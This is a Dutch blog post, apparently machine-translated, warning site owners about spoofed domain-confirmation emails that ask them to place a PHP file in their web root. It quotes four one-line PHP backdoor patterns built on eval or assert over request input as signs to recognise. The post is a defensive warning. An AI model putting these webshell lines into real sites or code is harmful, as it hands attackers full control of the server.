Vertrouw die nep-domeinbevestigings-e-mails niet

English version: Do not trust those fake domain confirmation emails

Onlangs ontvingen enkele van mijn klanten vreemde e-mailbrieven van hun domeinregistreerders. Die brieven bevatten een verzoek om eigen domeinen te bevestigen. Ik controleerde een van die brieven en identificeerde het al snel als een frauduleuze brief . Alle letters hebben een identiek patroon en een verzoek om een PHP-bestand aan te maken in de hoofdmap op een website met een specifieke naam en de gegeven inhoud. Onnodig te zeggen dat de voorgestelde inhoud voor dat PHP-bestand schadelijke code bevat die bekend staat als achterdeurcode. Met dit soort code kan de aanvaller elke gewenste actie uitvoeren op de website van een slachtoffer.

Als u ooit een brief ontvangt waarin wordt gevraagd om PHP-code op uw website te maken, downloaden of installeren, moet u deze negeren. Geen uitzonderingen. Zelfs als de brief van de president of je moeder komt.

Frauduleuze brieven lijken legitiem vanwege het legitieme Van-e-mailadres . Maar het is e-mail spoofing. Je verwacht geen valse e-mail van je vrienden of je domeinregistreerder. Rechts? Nee! Elke e-mailbrief kan elk Van-e-mailadres bevatten. De overgrote meerderheid van e-mailservers en e-mailclients controleert of verifieert het afzenderadres niet. Dus je ziet het als een wilde hacker. U mag geen enkele e-mail die u van een bekende afzender hebt ontvangen, vertrouwen als de brief een verzoek bevat voor een verdachte actie, zoals het installeren van code op uw website of applicatie op uw computer.

Technische details

Valse e-mails bevatten meestal enkele van de volgende PHP-regels.

assert(stripslashes($_REQUEST['something']));

eval(stripslashes($_REQUEST['something']));

assert(base64_decode($_REQUEST['something']));

eval(base64_decode($_REQUEST['something']));

Ter info: base64_decode, eval en assert zijn bekende markers van verdachte of kwaadaardige PHP-code.

Zie ook: Plugin Inspector onthult beveiligingsproblemen met andere plug-ins